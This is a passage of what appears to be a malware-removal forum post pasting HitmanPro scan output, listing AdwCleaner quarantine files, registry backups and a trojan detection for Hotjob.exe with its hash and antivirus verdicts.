          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.2s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.2s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.2s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.4s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.5s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.5s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.5s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.5s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.6s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.6s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.6s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.7s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.7s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.7s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.7s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.7s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.8s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.8s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          0.8s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          0.9s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          0.9s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          0.9s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          0.9s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.0s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.0s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.0s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.0s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.0s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.3s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.4s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.5s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          6.9s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.4s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.6s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.5s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

BaBi · 13.02.2017, 23:02

hitman teil 5

Code:

ATTFilter

   C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
      Size . . . . . . . : 122.880 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : CE5D370F424E98BEE6A805E2336D197110946548452650F0D44851CE17829810
      Version  . . . . . : 2.0.0.11
      Copyright  . . . . : Copyright (C) 2015
    > Bitdefender  . . . : Gen:Variant.Graftor.304300
    > Kaspersky  . . . . : Trojan.Win32.Vilsel.cufb
    > HitmanPro  . . . . : Mal/Generic-S
      Fuzzy  . . . . . . : 103.0
      Forensic Cluster
         -2.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.9s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.9s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.9s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.8s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.8s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.7s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.7s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
